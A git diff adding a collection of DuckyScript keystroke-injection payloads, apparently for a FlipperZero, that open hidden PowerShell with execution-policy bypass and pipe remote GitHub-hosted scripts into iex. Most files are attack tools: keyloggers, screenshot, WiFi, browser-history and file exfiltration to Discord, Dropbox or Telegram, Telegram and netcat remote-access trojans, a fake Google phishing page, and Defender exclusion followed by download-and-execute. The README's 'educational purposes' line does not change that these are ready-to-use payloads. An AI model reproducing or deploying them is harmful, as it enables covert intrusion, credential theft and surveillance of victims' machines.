diff --git a/Fast-Execution-Scripts/Add-Defender-Exclusion.txt b/Fast-Execution-Scripts/Add-Defender-Exclusion.txt new file mode 100644 index 0000000..8a5eb26 --- /dev/null +++ b/Fast-Execution-Scripts/Add-Defender-Exclusion.txt @@ -0,0 +1,22 @@ +REM Title: Add Windows Defender Exclusion +REM Author: @beigeworm | https://github.com/beigeworm +REM Description: Add Windows Defender Exclusion for C:/ drive. +REM Target: Windows 10 + +REM *SETUP* +REM replace FILE_URL_HERE with the url of your file to run. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C Add-MpPreference -ExclusionPath C:/ + +REM replace FILE_URL_HERE below. +STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit + +CTRL-SHIFT ENTER +DELAY 3000 +ALT y diff --git a/Fast-Execution-Scripts/Browser-History-to-Discord.txt b/Fast-Execution-Scripts/Browser-History-to-Discord.txt new file mode 100644 index 0000000..321ff46 --- /dev/null +++ b/Fast-Execution-Scripts/Browser-History-to-Discord.txt @@ -0,0 +1,19 @@ +REM Title: beigeworm's browser history to Discord Webhook. +REM Author: @beigeworm +REM Description: This script collects browser history and posts results to a discord webhook. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Brwsr-Hist.ps1 | iex +ENTER + + diff --git a/Fast-Execution-Scripts/Desktop-Shortcut-Spam.txt b/Fast-Execution-Scripts/Desktop-Shortcut-Spam.txt new file mode 100644 index 0000000..90ed184 --- /dev/null +++ b/Fast-Execution-Scripts/Desktop-Shortcut-Spam.txt @@ -0,0 +1,16 @@ +REM Title: beigeworm's Desktop Shortcut Spammer. +REM Author: @beigeworm +REM Description: This script creates 100 shortcuts on the users Desktop. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Lnk-Spam.ps1 | iex +ENTER + + diff --git a/Fast-Execution-Scripts/Discord-Image-spam.txt b/Fast-Execution-Scripts/Discord-Image-spam.txt new file mode 100644 index 0000000..66caf57 --- /dev/null +++ b/Fast-Execution-Scripts/Discord-Image-spam.txt @@ -0,0 +1,19 @@ + +REM Title: beigeworm's Spam blank image to Discord Webhook. +REM Author: @beigeworm +REM Description: This script sends a blank image to a discord webhook 25 times. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/DCimg-spam.ps1 | iex +ENTER + diff --git a/Fast-Execution-Scripts/Discord-WiFi-Grabber.txt b/Fast-Execution-Scripts/Discord-WiFi-Grabber.txt new file mode 100644 index 0000000..96e1644 --- /dev/null +++ b/Fast-Execution-Scripts/Discord-WiFi-Grabber.txt @@ -0,0 +1,19 @@ +REM Title: beigeworm's saved WiFi to Discord Webhook. +REM Author: @beigeworm +REM Description: This script collects saved WiFi info and posts results to a discord webhook. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/DC-WiFi-Grab.ps1 | iex +ENTER + + diff --git a/Fast-Execution-Scripts/Download-Execute.txt b/Fast-Execution-Scripts/Download-Execute.txt new file mode 100644 index 0000000..393ace0 --- /dev/null +++ b/Fast-Execution-Scripts/Download-Execute.txt @@ -0,0 +1,22 @@ +REM Title: Download-Execute from Run Prompt +REM Author: @beigeworm | https://github.com/beigeworm +REM Description: Uses the Run Prompt to download a file and run it. +REM Target: Windows 10 + +REM *SETUP* +REM replace FILE_URL_HERE with the url of your file to run. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:/;Start-Sleep 1; + +REM replace FILE_URL_HERE below. +STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit + +CTRL-SHIFT ENTER +DELAY 3000 +ALT y diff --git a/Fast-Execution-Scripts/Exfil-to-Dropbox.txt b/Fast-Execution-Scripts/Exfil-to-Dropbox.txt new file mode 100644 index 0000000..0bb4b00 --- /dev/null +++ b/Fast-Execution-Scripts/Exfil-to-Dropbox.txt @@ -0,0 +1,20 @@ + +REM Title: beigeworm's Exfiltrate files to Dropbox +REM Author: @beigeworm +REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account. +REM Target: Windows 10 + +REM *SETUP* +REM replace DDROPBOX_TOKEN with your Dropbox Token. +REM for setup instructions visit - https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Discord%20Scripts/Exfiltrate%20to%20Dropbox.ps1 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Exfil-to-Dropbox.ps1 | iex +ENTER + diff --git a/Fast-Execution-Scripts/File-Changes-to-Discord.txt b/Fast-Execution-Scripts/File-Changes-to-Discord.txt new file mode 100644 index 0000000..17521de --- /dev/null +++ b/Fast-Execution-Scripts/File-Changes-to-Discord.txt @@ -0,0 +1,20 @@ + +REM Title: beigeworm's monitor file changes to Discord Webhook. +REM Author: @beigeworm +REM Description: This script monitors any file changes in the USERPROFILE directory and posts results to a discord webhook. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/FileAC-to-DC.ps1 | iex +ENTER + + diff --git a/Fast-Execution-Scripts/Gif-Player.txt b/Fast-Execution-Scripts/Gif-Player.txt new file mode 100644 index 0000000..fafe158 --- /dev/null +++ b/Fast-Execution-Scripts/Gif-Player.txt @@ -0,0 +1,16 @@ +REM Title: beigeworm's GIF Player. +REM Author: @beigeworm +REM Description: This script changes downlaods a rick and morty GIF and plays it in a GUI window. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/GIF-Play.ps1 | iex +ENTER + + diff --git a/Fast-Execution-Scripts/Google-Phishing-to-Discord.txt b/Fast-Execution-Scripts/Google-Phishing-to-Discord.txt new file mode 100644 index 0000000..528edea --- /dev/null +++ b/Fast-Execution-Scripts/Google-Phishing-to-Discord.txt @@ -0,0 +1,20 @@ + +REM Title: beigeworm's Fake Google Phishing page to Discord Webhook. +REM Author: @beigeworm +REM Description: This script makes a Fake Google Phishing page and posts results to a discord webhook. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Google-Phish.ps1 | iex +ENTER + + diff --git a/Fast-Execution-Scripts/Keylog-to-Discord.txt b/Fast-Execution-Scripts/Keylog-to-Discord.txt new file mode 100644 index 0000000..e7f87c1 --- /dev/null +++ b/Fast-Execution-Scripts/Keylog-to-Discord.txt @@ -0,0 +1,20 @@ + +REM Title: beigeworm's Keyloggger to Discord Webhook. +REM Author: @beigeworm +REM Description: This script logs all Keystrokes and posts results to a discord webhook every 5 mins. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Keylog-to-DC.ps1 | iex +ENTER + + diff --git a/Fast-Execution-Scripts/Mouse-Activity-to-Discord.txt b/Fast-Execution-Scripts/Mouse-Activity-to-Discord.txt new file mode 100644 index 0000000..b657968 --- /dev/null +++ b/Fast-Execution-Scripts/Mouse-Activity-to-Discord.txt @@ -0,0 +1,20 @@ + +REM Title: beigeworm's monitor mouse activity to Discord Webhook. +REM Author: @beigeworm +REM Description: This script monitors mouse activity and posts results to a discord webhook. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/MouseAC-to-DC.ps1 | iex +ENTER + + diff --git a/Fast-Execution-Scripts/Netcat-Client-w-Functions-(admin).txt b/Fast-Execution-Scripts/Netcat-Client-w-Functions-(admin).txt new file mode 100644 index 0000000..5b2f1c1 --- /dev/null +++ b/Fast-Execution-Scripts/Netcat-Client-w-Functions-(admin).txt @@ -0,0 +1,21 @@ + +REM Title: Beigeworm's Netcat Client with Extra Fuctions +REM Author: @beigeworm +REM Description: This script connects target computer with a netcat session to send powershell commands. +REM EXTRA FUNCTIONS - (to see extra functions type "options" once connected..) +REM Target: Windows 10 + +REM *SETUP* +REM replace IP_HERE with your netcat attacker IP Address. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/NC-Func.ps1 | iex +CTRL-SHIFT ENTER +DELAY 3000 +ALT y diff --git a/Fast-Execution-Scripts/Netcat-Client-w-Functions.txt b/Fast-Execution-Scripts/Netcat-Client-w-Functions.txt new file mode 100644 index 0000000..6cf6183 --- /dev/null +++ b/Fast-Execution-Scripts/Netcat-Client-w-Functions.txt @@ -0,0 +1,20 @@ + +REM Title: Beigeworm's Netcat Client with Extra Fuctions +REM Author: @beigeworm +REM Description: This script connects target computer with a netcat session to send powershell commands. +REM EXTRA FUNCTIONS - (to see extra functions type "options" once connected..) +REM Target: Windows 10 + +REM *SETUP* +REM replace IP_HERE with your netcat attacker IP Address. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/NC-Func.ps1 | iex +ENTER + diff --git a/Fast-Execution-Scripts/README.md b/Fast-Execution-Scripts/README.md new file mode 100644 index 0000000..b0fb040 --- /dev/null +++ b/Fast-Execution-Scripts/README.md @@ -0,0 +1,20 @@ +# Downloadable-Ducky-Scripts-For-FlipperZero + +**These scripts download scripts to run from this repo -** + +https://github.com/beigeworm/assets/tree/main/Scripts + +they all use this command > `powershell -NoP -Ep Bypass -W H -C $variable='USER_INPUT_HERE'; irm HOSTED_SCRIPT_URL_HERE | iex` + +These scripts range from harmless pranks to nefarious red team tools. For educational purposes only! + +**If you want to learn more about the code, or modify them, most of these scripts are in powershell format here** + +https://github.com/beigeworm/Powershell-Tools-and-Toys + +# Pre-Deployment Setup +Most of these scripts will require some setup before they will work. + +# If you like my work please leave a star. ⭐ + + diff --git a/Fast-Execution-Scripts/Screenshot-to-Dropbox.txt b/Fast-Execution-Scripts/Screenshot-to-Dropbox.txt new file mode 100644 index 0000000..c80e836 --- /dev/null +++ b/Fast-Execution-Scripts/Screenshot-to-Dropbox.txt @@ -0,0 +1,20 @@ + +REM Title: beigeworm's Exfiltrate files to Dropbox +REM Author: @beigeworm +REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account. +REM Target: Windows 10 + +REM *SETUP* +REM replace DDROPBOX_TOKEN with your Dropbox Token. +REM for setup instructions visit - https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Discord%20Scripts/Exfiltrate%20to%20Dropbox.ps1 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/SShot-to-Dropbox.ps1 | iex +ENTER + diff --git a/Fast-Execution-Scripts/Screenshots-to-Discord.txt b/Fast-Execution-Scripts/Screenshots-to-Discord.txt new file mode 100644 index 0000000..7145000 --- /dev/null +++ b/Fast-Execution-Scripts/Screenshots-to-Discord.txt @@ -0,0 +1,20 @@ + +REM Title: beigeworm's periodic Screenshots to discord webhook +REM Author: @beigeworm +REM Description: This script takes a screenshot of the deasktop every 5 mins and posts to a discord webhook. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/SShots-to-DC.ps1 | iex +ENTER + + diff --git a/Fast-Execution-Scripts/Simple-Netcat-Client-(admin).txt b/Fast-Execution-Scripts/Simple-Netcat-Client-(admin).txt new file mode 100644 index 0000000..e7ba28a --- /dev/null +++ b/Fast-Execution-Scripts/Simple-Netcat-Client-(admin).txt @@ -0,0 +1,20 @@ + +REM Title: Beigeworm's Simple Netcat Client +REM Author: @beigeworm +REM Description: This script connects target computer with a netcat session to send powershell commands. +REM Target: Windows 10 + +REM *SETUP* +REM replace IP_HERE with your netcat attacker IP Address. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/NC-Client.ps1 | iex +CTRL-SHIFT ENTER +DELAY 3000 +ALT y diff --git a/Fast-Execution-Scripts/Simple-Netcat-Client.txt b/Fast-Execution-Scripts/Simple-Netcat-Client.txt new file mode 100644 index 0000000..8787938 --- /dev/null +++ b/Fast-Execution-Scripts/Simple-Netcat-Client.txt @@ -0,0 +1,19 @@ + +REM Title: Beigeworm's Simple Netcat Client +REM Author: @beigeworm +REM Description: This script connects target computer with a netcat session to send powershell commands. +REM Target: Windows 10 + +REM *SETUP* +REM replace IP_HERE with your netcat attacker IP Address. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/NC-Client.ps1 | iex +ENTER + diff --git a/Fast-Execution-Scripts/Sys-Info-to-Discord.txt b/Fast-Execution-Scripts/Sys-Info-to-Discord.txt new file mode 100644 index 0000000..b96dcee --- /dev/null +++ b/Fast-Execution-Scripts/Sys-Info-to-Discord.txt @@ -0,0 +1,19 @@ + +REM Title: beigeworm's system information to discord webhook +REM Author: @beigeworm +REM Description: This script gathers system information and posts to a discord webhook address with the results. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Sys-Info-to-DC.ps1 | iex +ENTER + diff --git a/Fast-Execution-Scripts/Sys-Info-to-Telegram.txt b/Fast-Execution-Scripts/Sys-Info-to-Telegram.txt new file mode 100644 index 0000000..7f8dd77 --- /dev/null +++ b/Fast-Execution-Scripts/Sys-Info-to-Telegram.txt @@ -0,0 +1,20 @@ + +REM Title: beigeworm's system information to Telegram Bot +REM Author: @beigeworm +REM Description: This script gathers system information and posts to Telegram Bot Chat with the results. +REM for setup info on telegram bots see - https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Telegram%20and%20Dropbox%20Scripts/Simple%20Telegram%20RAT.ps1 +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Sys-Info-to-TG.ps1 | iex +ENTER + diff --git a/Fast-Execution-Scripts/Telegram-RAT-(admin).txt b/Fast-Execution-Scripts/Telegram-RAT-(admin).txt new file mode 100644 index 0000000..9f7edba --- /dev/null +++ b/Fast-Execution-Scripts/Telegram-RAT-(admin).txt @@ -0,0 +1,23 @@ + +REM Title: Beigeworm's Telegram RAT +REM Author: @beigeworm +REM Description: This script connects target computer with a telegram chat to send powershell commands +REM Target: Windows 10 + +REM *SETUP* +REM replace TELEGRAM_TOKEN with your telegram Bot token. +REM replace CHAT_ID with your telegram bot Chat ID. +( for instructions visit https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Telegram%20and%20Dropbox%20Scripts/Simple%20Telegram%20RAT.ps1 ) + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/TG-RAT.ps1 | iex +CTRL-SHIFT ENTER +DELAY 3000 +ALT y + diff --git a/Fast-Execution-Scripts/Telegram-RAT-w-Functions-(admin).txt b/Fast-Execution-Scripts/Telegram-RAT-w-Functions-(admin).txt new file mode 100644 index 0000000..e4e0ac1 --- /dev/null +++ b/Fast-Execution-Scripts/Telegram-RAT-w-Functions-(admin).txt @@ -0,0 +1,23 @@ + +REM Title: Beigeworm's Telegram RAT with Extra Functions +REM Author: @beigeworm +REM Description: This script connects target computer with a telegram chat to send powershell commands. +REM EXTRA COMMANDS - (once connected type "options" to see a list of extra fuctions) +REM Target: Windows 10 + +REM *SETUP* +REM replace TELEGRAM_TOKEN with your telegram Bot token. +REM replace CHAT_ID with your telegram bot Chat ID. +( for instructions visit https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Telegram%20and%20Dropbox%20Scripts/Simple%20Telegram%20RAT.ps1 ) + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/TG-RAT-Func.ps1 | iex +CTRL-SHIFT ENTER +DELAY 3000 +ALT y diff --git a/Fast-Execution-Scripts/Telegram-RAT-w-Functions.txt b/Fast-Execution-Scripts/Telegram-RAT-w-Functions.txt new file mode 100644 index 0000000..57e56c2 --- /dev/null +++ b/Fast-Execution-Scripts/Telegram-RAT-w-Functions.txt @@ -0,0 +1,22 @@ + +REM Title: Beigeworm's Telegram RAT with Extra Functions +REM Author: @beigeworm +REM Description: This script connects target computer with a telegram chat to send powershell commands. +REM EXTRA COMMANDS - (once connected type "options" to see a list of extra fuctions) +REM Target: Windows 10 + +REM *SETUP* +REM replace TELEGRAM_TOKEN with your telegram Bot token. +REM replace CHAT_ID with your telegram bot Chat ID. +( for instructions visit https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Telegram%20and%20Dropbox%20Scripts/Simple%20Telegram%20RAT.ps1 ) + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/TG-RAT-Func.ps1 | iex +ENTER + diff --git a/Fast-Execution-Scripts/Telegram-RAT.txt b/Fast-Execution-Scripts/Telegram-RAT.txt new file mode 100644 index 0000000..a53c6fa --- /dev/null +++ b/Fast-Execution-Scripts/Telegram-RAT.txt @@ -0,0 +1,21 @@ + +REM Title: Beigeworm's Telegram RAT +REM Author: @beigeworm +REM Description: This script connects target computer with a telegram chat to send powershell commands +REM Target: Windows 10 + +REM *SETUP* +REM replace TELEGRAM_TOKEN with your telegram Bot token. +REM replace CHAT_ID with your telegram bot Chat ID. +( for instructions visit https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Telegram%20and%20Dropbox%20Scripts/Simple%20Telegram%20RAT.ps1 ) + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/TG-RAT.ps1 | iex +ENTER + diff --git a/Fast-Execution-Scripts/US-Keyboard.txt b/Fast-Execution-Scripts/US-Keyboard.txt new file mode 100644 index 0000000..297bb4d --- /dev/null +++ b/Fast-Execution-Scripts/US-Keyboard.txt @@ -0,0 +1,19 @@ +REM Title: beigeworm's Keyboard Language changer. +REM Author: @beigeworm +REM Description: This script changes the keyboard layout and system language to US. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/US-keyboard.ps1 | iex +CTRL-SHIFT ENTER +DELAY 3000 +ALT y + + + diff --git a/Fast-Execution-Scripts/Wallpaper-Jumpscare.txt b/Fast-Execution-Scripts/Wallpaper-Jumpscare.txt new file mode 100644 index 0000000..2e0e4c7 --- /dev/null +++ b/Fast-Execution-Scripts/Wallpaper-Jumpscare.txt @@ -0,0 +1,17 @@ +REM Title: beigeworm's Wallpaper Jump Scare. +REM Author: @beigeworm +REM Description: This script changes downlaods a scary image and sets it as a wallpaper. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/wallpaper.ps1 | iex +CTRL-SHIFT ENTER +DELAY 3000 +ALT y +